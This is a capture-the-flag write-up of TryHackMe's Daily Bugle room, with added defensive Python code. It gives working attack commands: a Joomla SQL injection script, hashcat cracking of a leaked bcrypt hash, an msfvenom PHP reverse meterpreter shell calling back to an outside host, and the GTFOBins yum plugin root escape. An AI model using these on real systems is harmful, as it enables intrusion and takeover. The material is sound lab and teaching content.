- Link: https://tryhackme.com/room/dailybugle
- Difficulty: hard
- Highlight: leveraging sudo privileges on yum to gain persistent root access
- Tools used:
- Tags: joomla, sqli, yum
This box is another black-box-style challenge with a few extra guiding questions.
We learn that the “Daily Bugle” reports front-page news about Spiderman robbing a bank. It’s our job to hack into the system to recover the user + root flags.
The tags (joomla, sqli, yum) also point us in the direction of the Joomla service, SQL injection, and leveraging user permissions on the yum binary to gain root access.
We start with a full nmap scan:
sudo nmap -A -oN nmap-results.txt <$targetIP> -O
And we’ll follow that up with an nmap script scan for more information about potential vulnerabilities:
nmap --script vuln -O -oN nmap-vuln.txt 10.10.239.203
Here is a snippet of interesting dirb scan results:
Notable findings include the hidden web directory (/administrator) that has a login portal. We’ll keep this in mind for later on in the hack.
Cross-referencing the vulnerability discovered by our nmap vuln script scan in exploit-db, we find a downloadable text exploit file with instructions to use
I attempted to execute this exploit via Metasploit console but had no luck.
Plan B is to use sqlmap with the command given in the text file from
Our first attempt at using sqlmap errors out, so we lower the risk variable and try again.
Our new command with risk=2 completes the job, but doesn’t turn up anything interesting.
Let’s search around for a different method to exploit this vulnerability.
We searched for a Joomla 3.7.0 exploit and found a Python script. Let’s go ahead and use the following command to start the exploit:
python3 sqli.py http://<$targetIP>/index.php?component/users/?view=login?
Success! We extracted a username and a hashed password.
Extracting users from fb9j5_users [$] Found user ['811', 'Super User', 'jonah', 'email@example.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
CRACK THAT HASH WITH HASHCAT
Let’s fire up hashcat and start the cracking!
A quick Google search for a hash identifier website helps us determine that the hashing method used is the bcrypt/Blowfish algorithm. I looked up the id number for this hash in the help for hashcat and found it was 3200 (the value passed to -m below).
I omitted this step from the video to save time and keep people watching.
Hashcat took 51 mins, 18 secs to crack the hash using rockyou.txt for the wordlist. I also attempted to use John the Ripper to crack this hash, which was much slower than hashcat on my machine.
After saving the hash string in a file named “hash”, we can let hashcat do the work from here. The cracking run takes the hash file and rockyou.txt as its two positional arguments; once it has finished, the --show option prints the cracked plaintext from hashcat’s potfile:
hashcat -m 3200 --show hash
Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm
Time.Started.....: Mon Jan 30 12:15:23 2023 (51 mins, 18 secs)
Time.Estimated...: Mon Jan 30 13:06:41 2023 (0 secs)
Guess.Base.......: File (/home/kalisurfer/hacking-tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 15 H/s (17.05ms) @ Accel:8 Loops:8 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests
Progress.........: 46848/14344384 (0.33%)
Rejected.........: 0/46848 (0.00%)
Restore.Point....: 46816/14344384 (0.33%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidates.#1....: sword -> smile4ever
Started: Mon Jan 30 12:15:18 2023
Stopped: Mon Jan 30 13:06:42 2023
The cracked hash was saved as a new file in the current directory. Now that we have our username and password we can go ahead and log in to that administrator portal we discovered earlier.
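The status block above is worth reading from the defender’s side. The following Python is an example added here, not code from the writeup or from hashcat: it parses hashcat’s Name....: value lines and turns the Speed, Progress and bcrypt cost fields into an estimate of how long exhausting the whole wordlist would take at this rate, and how that estimate changes at a higher bcrypt cost. The sample text is the page’s own status block trimmed to the fields used; the helper names and the assumption that bcrypt work doubles per +1 cost (which is how bcrypt is defined) are this example’s, not hashcat’s API.

```python
"""Read hashcat's status block and translate its numbers into defender terms.

Added example (not part of the writeup). Parses the key/value lines hashcat
prints, then uses Speed, Progress and the bcrypt cost in the target hash to
estimate wordlist exhaustion time at the observed cost and at a higher one.
"""
import re

# Constructed sample: the status block from this page, trimmed to the fields
# the helpers below read (other fields are ignored).
SAMPLE_STATUS = """\
Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm
Speed.#1.........: 15 H/s (17.05ms) @ Accel:8 Loops:8 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests
Progress.........: 46848/14344384 (0.33%)
"""

# "Name....: value" -- the name may itself contain dots (Hash.Target, Speed.#1),
# so match the shortest name followed by padding dots and ": ".
FIELD_RE = re.compile(r"^(?P<key>.+?)\.+: (?P<value>.*)$")
SPEED_RE = re.compile(r"(?P<num>\d+(?:\.\d+)?)\s*(?P<unit>[kMG]?)H/s")
PROGRESS_RE = re.compile(r"(?P<done>\d+)/(?P<total>\d+)")
BCRYPT_COST_RE = re.compile(r"^\$2[abxy]\$(?P<cost>\d\d)\$")
UNIT_SCALE = {"": 1.0, "k": 1e3, "M": 1e6, "G": 1e9}
SECONDS_PER_DAY = 86400


def parse_status(text):
    """Return {field: value} for every 'Name....: value' line."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.rstrip())
        if m:
            fields[m.group("key")] = m.group("value")
    return fields


def hashes_per_second(speed_field):
    """'15 H/s (...)' -> 15.0; handles k/M/G prefixes hashcat uses for faster modes."""
    m = SPEED_RE.search(speed_field)
    if not m:
        raise ValueError(f"unrecognised speed field: {speed_field!r}")
    return float(m.group("num")) * UNIT_SCALE[m.group("unit")]


def progress(progress_field):
    """'46848/14344384 (0.33%)' -> (46848, 14344384)."""
    m = PROGRESS_RE.search(progress_field)
    if not m:
        raise ValueError(f"unrecognised progress field: {progress_field!r}")
    return int(m.group("done")), int(m.group("total"))


def bcrypt_cost(target_field):
    """Cost factor from a '$2y$10$...' modular-crypt string (10 here)."""
    m = BCRYPT_COST_RE.match(target_field)
    if not m:
        raise ValueError(f"not a bcrypt hash: {target_field!r}")
    return int(m.group("cost"))


def rate_at_cost(rate, observed_cost, new_cost):
    """bcrypt doubles its work for every +1 cost, so the attacker's rate halves."""
    return rate / 2 ** (new_cost - observed_cost)


def summarize(status_text, higher_cost=12):
    """Defender-facing summary of one hashcat status block."""
    f = parse_status(status_text)
    rate = hashes_per_second(f["Speed.#1"])
    done, total = progress(f["Progress"])
    cost = bcrypt_cost(f["Hash.Target"])
    return {
        "cost": cost,
        "rate_hps": rate,
        "candidates_tried": done,
        "wordlist_size": total,
        "cracked_at_fraction": done / total,
        "days_to_exhaust": total / rate / SECONDS_PER_DAY,
        "days_to_exhaust_at_higher_cost":
            total / rate_at_cost(rate, cost, higher_cost) / SECONDS_PER_DAY,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_STATUS).items():
        print(f"{key:32} {value}")
```

On the page’s numbers the hash fell at candidate 46,848 of 14,344,384, so the password was recovered in 51 minutes only because it sat near the front of rockyou.txt; at 15 H/s the full list would take about 11 days, and about 44 days at cost 12. The cost factor is the one knob the application owner controls here, which makes it the obvious hardening change alongside closing the SQL injection that leaked the Super User’s hash.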
Now that we are in the system as an administrator, we can modify the pages to add a revshell script. We’ll use the template for error.php and change the payload to a reverse meterpreter shell.
CREATE A METERPRETER PAYLOAD
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.6.2.23 LPORT=2222 -f raw > rev.php
UPLOAD THE FILE IN TEMPLATES/ERROR.PHP
We’ll use the common text editor VIM to copy everything in the payload.php file to our clipboard using the quick and easy yank command, built from these parts:
% – apply the next command to all lines
y – yank (copy) the selected lines
+ – into the + register, i.e. the system clipboard
:q! – quit without saving
CATCH A REVERSE METERPRETER SHELL
We’ll set up the meterpreter listener using the exploit (multi/handler) options, being careful to set the payload to the same payload that we used when running msfvenom to create the malicious payload (payload = php/meterpreter_reverse_tcp).
After catching the meterpreter shell, we’ll proceed to upload linpeas and run it from the regular shell within the Metasploit console. The password for jjameson was discovered in plaintext.
LOGIN AS jjameson VIA SSH
Now that we presumably have a password login combo with jjameson, let’s try connecting via ssh. It works, and we are in as jjameson. Let’s grab the user flag and then continue on to
cat user.txt
27---omitted---2e
Let’s check sudo permissions with
Checking GTFOBins for yum, we find a pathway toward root privileges. All we have to do is cut and paste the following lines from GTFOBins. (Only the plugin file and the final command are reproduced here; the lines that create the temporary directory $TF and the yum config file $TF/x it points at are part of the same GTFOBins entry.)
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
Now we can recover the root flag in the usual spot:
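The yum rule is exactly the kind of sudo grant a periodic audit should catch before a box like this one is built. Here is a Python sudoers audit, added as an example and not part of the writeup or of GTFOBins, that parses sudoers-style rules (the same shape sudo -l reports) and flags any non-root user who may run ALL or a binary on a shell-escape watchlist. The sample rules are constructed to match what the writeup describes (jjameson may run yum via sudo); the default watchlist holds only yum, and the rule and finding field names are this example’s own.

```python
"""Audit sudoers rules for binaries that can spawn a shell when run as root.

Added example (not from the writeup). Reads sudoers-style text, such as the
rules 'sudo -l' reports, and flags entries whose command is ALL or a binary
that GTFOBins documents as a shell escape. Only yum, the binary this box
abuses, is on the default watchlist; extend it from GTFOBins for real audits.
"""
import os
import re
import shlex
from dataclasses import dataclass

# Constructed sample: a sudoers fragment consistent with what the writeup
# describes (jjameson may run yum through sudo). Not copied from the box.
SAMPLE_SUDOERS = """\
Defaults    env_reset
root        ALL=(ALL)       ALL
%wheel      ALL=(ALL)       ALL
jjameson    ALL=(ALL)       NOPASSWD: /usr/bin/yum
backup      ALL=(root)      /usr/bin/rsync, /usr/sbin/service httpd restart
"""

SHELL_ESCAPE_BINARIES = frozenset({"yum"})
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

# user host=(runas) [TAG:] cmd, cmd   -- the common rule shape; aliases are skipped.
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


@dataclass(frozen=True)
class SudoRule:
    user: str
    host: str
    runas: str
    nopasswd: bool
    commands: tuple


@dataclass(frozen=True)
class Finding:
    user: str
    command: str
    nopasswd: bool
    reason: str


def parse_sudoers(text):
    """Parse rule lines into SudoRule objects; comments, Defaults and aliases are ignored."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = False
        commands = []
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            # Tags such as NOPASSWD: or SETENV: may prefix a command; peel them off.
            while ":" in cmd and cmd.split(":", 1)[0].strip().isupper():
                tag, cmd = (part.strip() for part in cmd.split(":", 1))
                nopasswd = nopasswd or tag == "NOPASSWD"
            commands.append(cmd)
        rules.append(SudoRule(m.group("user"), m.group("host"),
                              m.group("runas") or "root", nopasswd, tuple(commands)))
    return rules


def find_shell_escape_risks(rules, watchlist=SHELL_ESCAPE_BINARIES):
    """Flag rules that hand a non-root user ALL or a shell-capable binary."""
    findings = []
    for rule in rules:
        if rule.user == "root":
            continue
        for cmd in rule.commands:
            if cmd == "ALL":
                findings.append(Finding(rule.user, cmd, rule.nopasswd,
                                        "unrestricted sudo (ALL)"))
                continue
            binary = os.path.basename(shlex.split(cmd)[0])
            if binary in watchlist:
                findings.append(Finding(rule.user, cmd, rule.nopasswd,
                                        f"{binary} can load a plugin and run code as root (GTFOBins)"))
    return findings


if __name__ == "__main__":
    for f in find_shell_escape_risks(parse_sudoers(SAMPLE_SUDOERS)):
        auth = "NOPASSWD" if f.nopasswd else "password"
        print(f"{f.user:10} {f.command:40} [{auth}] {f.reason}")
```

Extend SHELL_ESCAPE_BINARIES from GTFOBins for a real audit. Restricting yum’s arguments in sudoers would not close this one: the escape comes from yum honouring a caller-supplied config file and plugin directory, so the fix is to drop the rule, or to move the task behind a wrapper that never passes caller-controlled options to yum.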
Although this box has a difficulty rating of hard, I didn’t find it to be much more complex than some of the easy-rated boxes on TryHackMe. It did take a few extra hours to complete, so maybe length is a factor that they consider when determining difficulty ratings.
PERSONAL HACKING GOALS
My immediate goal is to get into the top 1% of hackers ranked on the platform. I’m currently in the top 2% and still need to surpass roughly 10,000 hackers before I can join the ranks in the top 1%.
Jumping from a new hacker to the top 3% seemed to happen very quickly. The jump to the top 2% took considerable effort, and the next jump seems exponentially more difficult.
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.